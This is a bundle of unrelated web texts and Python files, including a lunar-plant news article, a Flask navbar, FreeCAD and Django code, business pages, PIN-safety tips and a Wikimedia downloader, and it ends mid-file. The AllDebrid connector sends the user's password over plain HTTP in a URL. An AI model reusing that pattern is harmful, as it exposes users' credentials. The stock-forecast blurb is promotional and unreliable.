The craft and its tiny garden touched down on the Moon on January 3. Just to set things straight from the top, Chang’E-4 won’t be growing seeds on the lunar rocky surface itself – that is, in the regolith – in temperatures that veer between much colder and much hotter than what you’d find anywhere on Earth.
Instead, the craft is tending to cotton seeds buried in earthly soil, brought along in the container. The jar also contains potato, Arabidopsis and rapeseed seeds, plus a few fruit fly eggs and yeast – all loaded by researchers from Chongqing University.
The ability to grow plants on the Moon would represent an extremely useful resource for long term space missions, like a trip to Mars which would take about two-and-a-half years.
Can you really grow food on the Moon?
Researchers did perform many experiments on Earth though, growing seeds in a simulated lunar environment, as well as on the International Space Station – where algae and fungi survived about 500 days in space.
The first seeds flowering in space were on a Soviet craft Salyut 7 in 1982.
What is even more cause for worry is actually solar radiation. The Moon receives high particle radiation, much, much more than the ISS that is shielded by our planet’s magnetosphere. The sealed container tries to shield the plants inside, at least to a degree, but the conditions are much harsher.
The Moon also has extreme temperature swings – between day and night, and between areas that are exposed to the sun or covered by shade – with variations of 200-300 degrees Celsius in a single day. The container has a mechanism to transfer heat which should make it possible to maintain a temperature of about 20-30 degrees Celsius. According to Afshin Khan, an environmental scientist at the Blue Marble Space Institute of Science in Seattle, the heat control system is dependent on some kind of radioisotopic heat source, but the details are not clear.
Why isn’t it possible to grow plants on another planet?
Of course, growing fruits and vegetables requires the right amounts of oxygen, carbon dioxide, humidity, light and temperature control, and gravity — all of which can be extremely difficult to control in space.
Another problem is soil: It’s necessary for plant growth, but it also takes up precious space, and plants won’t readily grow in the soil on the moon or Mars. That’s why NASA is currently exploring techniques that use only a very little amount of soil. |
import json
from hashlib import sha1
from flask_nav import Nav
from flask_nav.elements import Navbar, View, Subgroup, Link, Text
from flask_bootstrap.nav import BootstrapRenderer
from flask import session, url_for
from dominate import tags
class LinkTab(Link):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class LogIn(View):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class SeparatorAlign(Text):
def __init__(self):
super().__init__("")
class Navigation:
with open("configs/base.json", "r") as base_config_file:
base_config = json.load(base_config_file)
base = ['TiT', View('Home', 'home'), View('Account', "account.home")]
services = [View('JF Service', "jf.home"), View('Buyback Service', 'buyback.home'),
View('Fittings', "fittings.home"), View("Market Service", "ordering.home")]
settings = [SeparatorAlign(), View("Bug Report", 'issues'), View("Change Theme", "settings"),
View('Log Out', 'auth.log_out')]
alliance = base + services
corp = base + [Subgroup("Corporation", View('Corp Main', "corp.home"),
LinkTab("Corp Forums", base_config["forum_url"])),
Subgroup("Services", *services)]
def __init__(self, app):
nav = Nav()
# noinspection PyUnusedLocal,PyAbstractClass,PyMethodMayBeStatic,PyPep8Naming
@nav.renderer('custom')
class CustomRenderer(BootstrapRenderer):
# External links now open in new tab
def visit_LinkTab(self, node):
item = tags.li()
item.add(tags.a(node.text, href=node.get_url(), target="_blank"))
return item
def visit_LogIn(self, node):
item = tags.li()
inner = item.add(tags.a(href=node.get_url(), _class="nav-image"))
inner.add(tags.img(src=url_for("static", filename="sso_login.png")))
if node.active:
item['class'] = 'active'
return item
def visit_SeparatorAlign(self, node):
return NotImplementedError
def visit_Navbar(self, node):
# create a navbar id that is somewhat fixed, but do not leak any
# information about memory contents to the outside
node_id = self.id or sha1(str(id(node)).encode()).hexdigest()
root = tags.nav() if self.html5 else tags.div(role='navigation')
root['class'] = 'navbar navbar-default'
cont = root.add(tags.div(_class='container-fluid'))
# collapse button
header = cont.add(tags.div(_class='navbar-header'))
btn = header.add(tags.button())
btn['type'] = 'button'
btn['class'] = 'navbar-toggle collapsed'
btn['data-toggle'] = 'collapse'
btn['data-target'] = '#' + node_id
btn['aria-expanded'] = 'false'
btn['aria-controls'] = 'navbar'
btn.add(tags.span('Toggle navigation', _class='sr-only'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
btn.add(tags.span(_class='icon-bar'))
# title may also have a 'get_url()' method, in which case we render
# a brand-link
if node.title is not None:
if hasattr(node.title, 'get_url'):
header.add(tags.a(node.title.text, _class='navbar-brand',
href=node.title.get_url()))
else:
header.add(tags.span(node.title, _class='navbar-brand'))
bar = cont.add(tags.div(
_class='navbar-collapse collapse',
id=node_id,
))
bar_list = bar.add(tags.ul(_class='nav navbar-nav'))
bar_list_right = bar.add(tags.ul(_class='nav navbar-nav navbar-right'))
to_right = False
for item in node.items:
if isinstance(item, SeparatorAlign):
to_right = True
continue
if not to_right:
bar_list.add(self.visit(item))
else:
bar_list_right.add(self.visit(item))
return root
@nav.navigation('anon')
def nav_anon():
return Navbar('TiT', View('Home', 'home'),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), LogIn('Log In', 'auth.sso_redirect'))
@nav.navigation('neut')
def nav_neut():
return Navbar('TiT', View('Home', 'home'), View('Account', "account.home"),
View('Buyback Service', 'buyback.home'), View('JF Service', "jf.home"),
View('Recruitment', 'recruitment.home'),
SeparatorAlign(), View("Change Theme", "settings"), View('Log Out', 'auth.log_out'))
@nav.navigation('corporation')
def nav_corp():
items = Navigation.corp + Navigation.settings
return Navbar(*items)
@nav.navigation('alliance')
def nav_alliance():
items = Navigation.alliance + Navigation.settings
return Navbar(*items)
@nav.navigation('admin')
def nav_admin():
admin_elements = []
role_elements = []
market_service = False
security = False
for role in session.get("UI_Roles"):
if role == "jf_admin":
admin_elements += [View('JF Routes', "jf.admin"), View('JF Stats', "jf.stats")]
elif role == "user_admin":
admin_elements.append(View('User Roles', "admin.roles"))
elif role == "jf_pilot":
role_elements.append(View('JF Service', "jf.pilot"))
elif role == "buyback_admin":
admin_elements.append(View('Buyback Service', 'buyback.admin'))
elif role in ["ordering_marketeer", "ordering_admin"] and not market_service:
role_elements.append(View('Market Service', 'ordering.admin'))
market_service = True
elif role in ["security_officer", "recruiter"] and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
if role == "security_officer":
role_elements.append(View('Security Info', 'security.home'))
admin_elements.append(View('Recruitment Settings', 'recruitment.admin'))
security = True
elif role == "recruiter" and not security:
role_elements.append(View('Recruitment Apps', 'recruitment.applications'))
subs = []
if role_elements:
subs.append(Subgroup('Role Pages', *role_elements))
if admin_elements:
subs.append(Subgroup('Admin Pages', *admin_elements))
if session["UI_Corporation"]:
items = Navigation.corp + subs + Navigation.settings
elif session["UI_Alliance"]:
items = Navigation.alliance + subs + Navigation.settings
else:
return nav_neut()
return Navbar(*items)
nav.init_app(app)
|
Ebonne L. Ruffins became Vice President of Local Media Development (LMD) at Comcast in March of 2016. Her team’s mission is to provide Comcast with a local business advantage through technologies and programming that reach customers down to the neighborhood level. Ebonne leads the company-wide strategy, creative vision, and technical execution of LMD’s broad portfolio of assets, which include: public, educational, and governmental (PEG) programming; Project Open Voice; EveryBlock digital platform and map app; Stringwire live streaming app; Comcast Newsmakers national and regional news platform; and the award-winning commemorative programming initiative, Voices of the Civil Rights Movement.
Before taking the helm of Comcast’s LMD team, Ebonne led diversity media communications for Comcast Corporation, overseeing national diversity advertising; print, radio, and online collateral communications; national surveys; and executive multimedia consulting. During her four-year tenure on the Corporate Diversity & Inclusion team, Ebonne developed Comcast’s first-ever mandatory employee diversity training module; launched Comcast NBCUniversal’s public diversity report and digital platform; and produced Comcast’s first ever Diversity Summit in December of 2015.
Prior to joining Comcast in 2011, Ebonne was an English and Spanish producer for the internationally acclaimed television series, CNN Heroes. At CNN, Ebonne produced award-winning multilingual stories on “ordinary people with an extraordinary impact” in 19 cities across five continents.
Ebonne began her career as an on-air reporter for WCAX TV, a CBS affiliate in Burlington, Vermont. She was also a reporter/producer for NPR in Washington, D.C., and a CNN Fellow and contributor for CNN’s Washington, D.C. Bureau. She also served as a co-producer for the award-winning intergenerational documentary, Life’s Essentials with Ruby Dee, released in 2014.
Currently, Ebonne is an Executive Board member and National Board member of the National Association for Multi-Ethnicity in Communications (NAMIC). Since 1999, Ebonne has served as co-founder and volunteer for the Mother-Daughter Senior Decorating Service, LLC, a residential decorating service for senior citizens and people with disabilities at the University of Pennsylvania Center for Rehabilitation and Care (PCRC).
Ebonne is a graduate of Northwestern University School of Law and the Medill Graduate School of Journalism. She is also a proud alumna of Spelman College. |
# ***************************************************************************
# * (c) 2009, 2010 Yorik van Havre <[email protected]> *
# * (c) 2009, 2010 Ken Cline <[email protected]> *
# * (c) 2020 Eliud Cabrera Castillo <[email protected]> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * FreeCAD is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with FreeCAD; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides GUI tools to split line and wire objects."""
## @package gui_split
# \ingroup draftguitools
# \brief Provides GUI tools to split line and wire objects.
## \addtogroup draftguitools
# @{
from PySide.QtCore import QT_TRANSLATE_NOOP
import FreeCAD as App
import FreeCADGui as Gui
import Draft_rc
import DraftVecUtils
import draftguitools.gui_base_original as gui_base_original
import draftguitools.gui_tool_utils as gui_tool_utils
from draftutils.messages import _msg
from draftutils.translate import translate
# The module is used to prevent complaints from code checkers (flake8)
True if Draft_rc.__name__ else False
class Split(gui_base_original.Modifier):
"""Gui Command for the Split tool."""
def GetResources(self):
"""Set icon, menu and tooltip."""
return {'Pixmap': 'Draft_Split',
'Accel': "S, P",
'MenuText': QT_TRANSLATE_NOOP("Draft_Split", "Split"),
'ToolTip': QT_TRANSLATE_NOOP("Draft_Split", "Splits the selected line or polyline into two independent lines\nor polylines by clicking anywhere along the original object.\nIt works best when choosing a point on a straight segment and not a corner vertex.")}
def Activated(self):
"""Execute when the command is called."""
super(Split, self).Activated(name=translate("draft","Split"))
if not self.ui:
return
_msg(translate("draft", "Click anywhere on a line to split it."))
self.call = self.view.addEventCallback("SoEvent", self.action)
def action(self, arg):
"""Handle the 3D scene events.
This is installed as an EventCallback in the Inventor view.
Parameters
----------
arg: dict
Dictionary with strings that indicates the type of event received
from the 3D view.
"""
if arg["Type"] == "SoKeyboardEvent":
if arg["Key"] == "ESCAPE":
self.finish()
elif arg["Type"] == "SoLocation2Event":
gui_tool_utils.getPoint(self, arg)
gui_tool_utils.redraw3DView()
elif (arg["Type"] == "SoMouseButtonEvent"
and arg["Button"] == "BUTTON1"
and arg["State"] == "DOWN"):
self.point, ctrlPoint, info = gui_tool_utils.getPoint(self, arg)
if "Edge" in info["Component"]:
return self.proceed(info)
def proceed(self, info):
"""Proceed with execution of the command after click on an edge."""
wire = App.ActiveDocument.getObject(info["Object"])
edge_index = int(info["Component"][4:])
Gui.addModule("Draft")
_cmd = "Draft.split"
_cmd += "("
_cmd += "FreeCAD.ActiveDocument." + wire.Name + ", "
_cmd += DraftVecUtils.toString(self.point) + ", "
_cmd += str(edge_index)
_cmd += ")"
_cmd_list = ["s = " + _cmd,
"FreeCAD.ActiveDocument.recompute()"]
self.commit(translate("draft", "Split line"),
_cmd_list)
self.finish()
Gui.addCommand('Draft_Split', Split())
## @}
|
Any pointers on what the script should looks like to do that? Is it possible?
What is a root folder of the synchronization?
What about files in other (sub)folders (if there are any)? What about files in the synchronization root folder?
Sorry about being vague, was trying to keep it general so that it other users in the same boat could benefit as well.
Within each of the monthly folders there are various files, there are 4 file names that get repeated with different file extensions (ATM01.*, ATM02.*, AMT03.* and ATM04.*), there could be other file names in there that I don't want (eg ATM08.*) but I don't know for sure what they will be so I only want to include the files that start with the 4 names given with any file extension after that name. (eg ATM01.txt, ATM01.csv...etc).
On the local machine the file path is H:\sftp\file\ and it should replicate the monthly folder structure.
So I want to synchronize from the Remote (FTP) server to the local machine based on the rules given above.
Is that enough information for you?
Thanks Martin that worked great! |
#-*- coding: utf-8 -*-
import os
import shutil
from django.core.management.base import BaseCommand, CommandError
# CURRENT_DIR = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
# BACKEND_DIR = os.path.abspath(os.path.join(CURRENT_DIR, os.pardir))
# APP_DIR = os.path.abspath(os.path.join(BACKEND_DIR, os.pardir))
# WEBAPPS_DIR = os.path.abspath(os.path.join(APP_DIR, os.pardir))
# For production:
CURRENT_DIR = '/home/tooski/webapps/python_core/python_core/rankings/'
BACKEND_DIR = '/home/tooski/webapps/python_core/python_core/'
APP_DIR = '/home/tooski/webapps/python_core/'
WEBAPPS_DIR = '/home/tooski/webapps/'
# For dev:
# CURRENT_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/rankings/'
# BACKEND_DIR = '/home/seba-1511/Dropbox/Dev/tooski/python_core/'
# APP_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
# WEBAPPS_DIR = '/home/seba-1511/Dropbox/Dev/tooski/'
class Command(BaseCommand):
args = 'None'
help = 'Updates the table to the latest races, directly scrapped from the FIS website.'
def handle(self, *args, **options):
os.system('rm ' + WEBAPPS_DIR + 'website/ranking.json')
os.system('rm ' + CURRENT_DIR + 'fis/ranking.json')
# We get the leaderboard rankings and move them to the Apache server:
os.system('cd ' + CURRENT_DIR +
'/fis/ && scrapy crawl ranking -o ranking.json -t json')
# Testing:
shutil.copy(CURRENT_DIR + 'fis/ranking.json',
WEBAPPS_DIR + 'website/ranking.json')
# Server
# shutil.copy(CURRENT_DIR + '/fis/ranking.json',
# WEBAPPS_DIR + '/website/ranking.json')
# We should use the pipeline system of scrapy with the races.
os.system('cd ' + CURRENT_DIR + '/fis/ && scrapy crawl races')
|
The Testing hours of operation for the Macon Cove, Union Avenue, and Millington locations are shown below. College business offices are not open on weekends. Please consult the Calendars, News, and Videos page for additional information related to holidays, closings, and other events.
Please visit Schedule a Test/Exam and select the appropriate heading to see the available schedule.
*Note: When classes are not in session, Macon Cove Testing is open from 8 a.m. to 4:30 p.m., Monday through Friday.
Defense Activity for Non-Traditional Education Support (DANTES) and College Level Examination Program (CLEP) are administered quarterly at the Millington Center. Please visit Schedule a Test/Exam and select the appropriate heading to see the available schedule.
This is not a full service testing facility. The hours are Tuesday and Thursday from 10 a.m.-2 p.m. Please visit Schedule a Test/Exam and select the appropriate heading to see the available schedule. |
"""
Copyright (c) 2013, SMART Technologies ULC
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Copyright holder (SMART Technologies ULC) nor
the names of its contributors (Joshua Henn) may be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER (SMART Technologies
ULC) "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from core.lib.robotremoteserver import RobotRemoteServer
import bootstrap
from entities import *
import os
import sys
import subprocess
import platform
from log import Logger
class Selenium:
vmrunPath = None
log = Logger()
def __init__(self):
"""Also this doc should be in shown in library doc."""
def start(self):
p = subprocess.Popen(['java', '-jar', 'java/selenium-server-standalone-2.21.0.jar'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if __name__ == '__main__':
#RobotRemoteServer(Selenium(), *sys.argv[1:])
s = Selenium()
s.start() |
We manage commercial facilities by providing supervision, training, service, certified pool operators, and chemicals and supplies. Commercial services can include facility evaluations, safety inspections for pool, development and implementation of operational and maintenance procedures, employee manuals, emergency plans and intensive training programs.
CPO® Certified Service – Hire us as your CPO® Certified technicians for weekly, biweekly or monthly* visits.
Pool Inspections – We can perform a detailed swimming pool inspection to let you know how your pool conforms to code and standards.
Aquatic Supervision Plans – A plan developed specifically for your pool outlining your facilities procedures and pool information.
Pool Staff Training – Training includes state requirements for pools, testing and adjusting chemicals, safety issues and other pool basics.
Pool Maintenance Service – We can visit your 1, 2 or 3 times a week and maintain your pool.
Emergency Visits – If something goes wrong at your pool, call us and we’ll come and fix it for you. Clients receive a 24 hour response time.
Leak Detection and Pressure Testing – Think you have leak, let one of our specially trained technicians help you.
Service Work – Pipework, tiling, chlorinator install and more. You need service work done at your pool, we can do it.
Swimming Pool Expert Witness – We provide swimming pool experts for legal causes including diving accidents, drowning accidents, chemical accidents, improper installation, etc.
* Monthly visits require a valid CPO® on your staff. ** Delivery option available only in select portions of New Jersey.
*** Travel fees will apply. |
# Generated by Django 2.2.4 on 2019-09-26 05:47
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [("account", "0033_serviceaccount")]
operations = [
migrations.CreateModel(
name="Webhook",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("target_url", models.URLField(max_length=255)),
("is_active", models.BooleanField(default=True)),
("secret_key", models.CharField(blank=True, max_length=255, null=True)),
(
"service_account",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="webhooks",
to="account.ServiceAccount",
),
),
],
options={"permissions": (("manage_webhooks", "Manage webhooks"),)},
),
migrations.CreateModel(
name="WebhookEvent",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"event_type",
models.CharField(
db_index=True, max_length=128, verbose_name="Event type"
),
),
(
"webhook",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="events",
to="webhook.Webhook",
),
),
],
),
]
|
Marshall MINI has locations across England and is dedicated to providing the ultimate customer service for drivers looking to purchase a new or used MINI, and those who already own their dream small car.
Our expert team can talk you through the entire range of vehicles, from the classic MINI Hatch to the exciting Countryman SUV. We also carry a number of Approved Used MINI models, including pre-owned, nearly new and ex-demonstrator models. The team can ask questions about your requirements and budget, then help you build your perfect car, with competitive finance available to make your purchase even more affordable.
If you would like to access a new MINI vehicle through the Motability Scheme, or require a fleet of vehicles for business purposes, our team can help.
At all of our locations, affordable aftersales care is performed by our team of trained experts. Whether your MINI requires its scheduled service, annual MOT or repairs following an accident or scrape, we can help.
Contact your nearest outlet today. We have sales and aftersales dealerships in Grimsby, Bournemouth, Salisbury and Hook (Hampshire), as well as a dedicated aftersales outlet in Scunthorpe. |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Conector para AllDebrid
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
from core import jsontools
from core import logger
from core import scrapertools
# Returns an array of possible video url's from the page_url
def get_video_url(page_url, premium=False, user="", password="", video_password=""):
logger.info("(page_url='%s' , user='%s' , password='%s', video_password=%s)" % (
page_url, user, "**************************"[0:len(password)], video_password))
page_url = correct_url(page_url)
url = 'http://www.alldebrid.com/service.php?pseudo=%s&password=%s&link=%s&nb=0&json=true&pw=' % (
user, password, page_url)
data = jsontools.load_json(scrapertools.downloadpage(url))
video_urls = []
if data and data["link"] and not data["error"]:
extension = ".%s [alldebrid]" % data["filename"].rsplit(".", 1)[1]
video_urls.append([extension, data["link"]])
else:
try:
server_error = "Alldebrid: " + data["error"].decode("utf-8", "ignore")
server_error = server_error.replace("This link isn't available on the hoster website.",
"Enlace no disponible en el servidor de descarga") \
.replace("Hoster unsupported or under maintenance.",
"Servidor no soportado o en mantenimiento")
except:
server_error = "Alldebrid: Error en el usuario/password o en la web"
video_urls.append([server_error, ''])
return video_urls
def correct_url(url):
if "userporn.com" in url:
url = url.replace("/e/", "/video/")
if "putlocker" in url:
url = url.replace("/embed/", "/file/")
return url
|
Theta Digital showcases latest high performance AV components | What Hi-Fi?
Californian manufacturer showcases latest high-performance AV components at the International Consumer Electronics Show (CES) 2014.
Californian company Theta Digital has showcased its latest high-performance AV components at the International Consumer Electronics Show (CES) 2014.
MORE: Stars of CES 2014 – the winners revealed!
The new components include the Casablanca IV Music and Cinema Controller – the latest version of the company's preamplifier/processor.
Advanced features of the new Casablanca model include a Dirac Live 96K digital room correction, a 192kHz post processing board and Theta's Jitter Jail II anti-jitter technology.
Theta's first Class D amplifiers – the Prometheus Monoblock Amplifiers – are the result of a collaboration between the company's chief engineer Dave Reich and Bruno Putzeys of Hypex.
The Compli Blu 3D Digital Transport (above) – optimised for digital playback and with no analogue outputs – and California Audio Technologies Custom Speaker system complete the line-up of new components.
Theta's new range of high-performance AV components will be distributed in the UK by Absolute Sounds. |
#!/usr/bin/env python3.9
import utils
from configVar import config_vars
try:
import networkx as nx
except ImportError as IE:
raise IE
def create_dependencies_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "depends"):
retVal.add_edge(iid, dependant)
return retVal
def create_inheritItem_graph(items_table):
retVal = nx.DiGraph()
for iid in items_table.get_all_iids():
for dependant in items_table.get_resolved_details_for_iid(iid, "inherit"):
retVal.add_edge(iid, dependant)
return retVal
def find_cycles(item_graph):
retVal = nx.simple_cycles(item_graph)
return retVal
def find_leaves(item_graph):
retVal = list()
for node in sorted(item_graph):
the_neighbors = item_graph.neighbors(node)
if not the_neighbors:
retVal.append(node)
return retVal
def find_needed_by(item_graph, node):
retVal = utils.set_with_order()
if node in item_graph:
predecessors = item_graph.predecessors(node)
for predecessor in predecessors:
if predecessor not in retVal:
retVal.append(predecessor)
retVal.extend(find_needed_by(item_graph, predecessor))
return retVal
|
If you lose your credit, debit or ATM card, how difficult would it be for someone to clean out your account? If you use any of the passwords pictured to the left, you can pretty much count on it.
More than one-quarter of all credit and debit card passwords could be guessed by attempting just 20 combinations of four-digit numbers, security experts say.
Your birthdate. If you lose your wallet, a thief has access to your birthdate from your driver’s license.
The ever-popular 1234. That’s one of the most popular PIN numbers – and one of the first thieves try.
The seven-digit 8675309. Remember that Tommy Tutone song?
Two-number combinations. Don’t use combinations such as 4545, 1313, and so on.
By the way, you also may want to pass on 3141592654. Those are the first digits of Pi. Want to know more about coming up with a password that thieves can’t crack? Check out this article. |
#!/usr/bin/env python
"""Get all images of a wikipedia commons category."""
import json
import logging
import os
import sys
import urllib # images
import urllib2 # text
import xmltodict
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def create_filelist(category):
"""
Create a list of files in a category.
Parameters
----------
category : string
Returns
-------
list
Examples
--------
>> wikicommons.create_filelist('Category:Unidentified Convolvulaceae')
"""
filelist = []
cats_to_explore = [category]
catsub = len("Category:")
visited_categories = []
while len(cats_to_explore) > 0:
sub_cat = cats_to_explore.pop() # Get next category
sub_filelist = get_direct_files(sub_cat) # Get direct members
for el in sub_filelist:
entry = {'filename': el['filename'],
'status': 'registered',
'category': os.path.join(category[catsub:],
el['category'][catsub:])}
filelist.append(entry)
# get subcategories
sub_categories = get_subcategories(sub_cat)
for el in sub_categories:
if el not in visited_categories:
cats_to_explore.append(el)
else:
logging.warning("Double category (%s)", sub_cat)
visited_categories.append(sub_cat)
logging.info("Done with sub_category '%s' (%i files), %i remaining",
sub_cat,
len(sub_filelist),
len(cats_to_explore))
return filelist
def download_filelist(category, file_path, pixels):
"""Download all files in filelist."""
if os.path.isfile(file_path):
with open(file_path) as data_file:
filelist = json.load(data_file)
else:
# File does not exist right now. Get data and create it.
logging.info("No file '%s' found. Get data.", file_path)
filelist = create_filelist(category)
logging.info("Got data for category '%s'. Write it to '%s'",
category,
file_path)
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info("The category '%s' has %i images.",
category,
len(filelist))
# Now load the images
logging.info("Start loading images for category '%s'", category)
for el in filelist:
if el['status'] != 'downloaded':
el['status'] = 'downloaded'
if not os.path.exists(el['category']):
os.makedirs(el['category'])
get_image(el['filename'],
pixels,
os.path.join(el['category'], el['filename']))
with open(file_path, 'w') as fp:
json.dump(filelist, fp, indent=2)
logging.info('Done loading files.')
def get_direct_files(category):
"""Get a list of all files in category."""
filelist = []
has_continue = True
data = {}
while has_continue:
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
if 'continue' in data:
url += "&cmcontinue=%s" % data['continue']['cmcontinue']
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
filelist.append({'filename': filename,
'category': category})
has_continue = 'continue' in data
return filelist
def get_file_details(commons_name):
"""
Get categories and similar stuff from a single file.
Parameters
----------
commons_name : str
Returns
-------
dict
Examples
--------
>>> get_file_details('Aurelia-aurita-3.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=128))
while True:
try:
response = urllib2.urlopen(url)
except:
continue
break
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
return {'categories': xmldict['response']['categories']['category'],
'img_url': xmldict['response']['file']['urls']['thumbnail']}
def get_image(commons_name, pixels, local_filename):
"""
Get a single image from Wikipedia Commons.
Parameters
----------
commons_name : str
pixels : int
Maximum dimension for both width and height
local_filename : str
Path where the image gets saved.
Returns
-------
None
Examples
--------
>>> get_image('Aurelia-aurita-3.jpg', 250, 'local_name.jpg')
>>> get_image('Aurelia-aurita-3.jpg', 500, 'local_name_500.jpg')
"""
base_url = "https://tools.wmflabs.org/magnus-toolserver/commonsapi.php"
url = ("{base_url}?image={image}&thumbwidth={pixels}&thumbheight={pixels}"
.format(base_url=base_url,
image=urllib.quote_plus(commons_name.encode('utf-8')),
pixels=pixels))
response = urllib2.urlopen(url)
xmldata = response.read()
xmldict = xmltodict.parse(xmldata)
img_url = xmldict['response']['file']['urls']['thumbnail']
urllib.urlretrieve(img_url, local_filename)
def download_complete_category(category, pixels, local_folder='.'):
"""
Download all files of a category (recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
Examples
--------
>>> download_complete_category("Category:Ipomoea", 128)
"""
directory = category[len("Category:"):]
store_here = os.path.join(local_folder, directory)
if not os.path.exists(store_here):
os.makedirs(store_here)
download_category_files(category, pixels, store_here)
sub_categories = get_subcategories(category)
for sub_cat in sub_categories:
download_complete_category(sub_cat, pixels, store_here)
def download_category_files(category, pixels, local_folder='.'):
"""
Download all files of a category (non-recursive).
Parameters
----------
category : string
pixels : int
Maximum size of dimensions of image
local_folder : string
Put files here.
Examples
--------
>> download_category_files("Category:Close-ups of Ipomoea flowers", 128)
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=file"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
for el in data['query']['categorymembers']:
filename = el['title'][len("File:"):]
logging.info(filename)
get_image(filename, pixels, os.path.join(local_folder, filename))
def get_subcategories(category):
"""
Get names of subcategories.
Parameters
----------
category : string
Returns
-------
list
Titles of all subcategories.
Examples
--------
>>> get_subcategories("Category:Ipomoea")[0]
u'Category:Close-ups of Ipomoea flowers'
"""
base_url = "https://commons.wikimedia.org/w/api.php"
url = ("{base_url}?action=query&list=categorymembers&cmtype=subcat"
"&format=json"
"&cmtitle={category}"
.format(base_url=base_url,
category=urllib.quote_plus(category.encode('utf-8'))))
response = urllib2.urlopen(url)
jsondata = response.read()
data = json.loads(jsondata)
cats = [el['title'] for el in data['query']['categorymembers']]
return cats
if __name__ == '__main__':
import doctest
doctest.testmod()
|
DVCR Buy or Sell? If you are planning to trade DVCR stock, then get a free DVCR technical analysis report. You will get a detailed stock analysis report to help you make a better DVCR stock predictions. The stock analysis service is provided by MarketClub, using their Smart Scan and Trade Triangle technology. It uses a combination of technical analysis, fundamental analysis and the current market condition to give you the best DVCR stock forecast.
The DVCR Stock Prediction is based on short term trend analysis and is best used for short term swing traders or day traders rather than long term investors.
Get a FREE analysis on DVCR now.
DVCR is down -6.74% on 04/17/19.
Short term rating on the DVCR stock: NEUTRAL with a score of 3/5.
Get a detailed DVCR stock analysis.
Compare DVCR with any other stocks with the compare two stocks feature. |
# -*- coding: utf-8 -*-
"""
Author: Rachael Kretsch
Big Data Final Project
Secondary Protein Structure
analyse the literature data!!
"""
import pickle
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
#==============================================================================
#
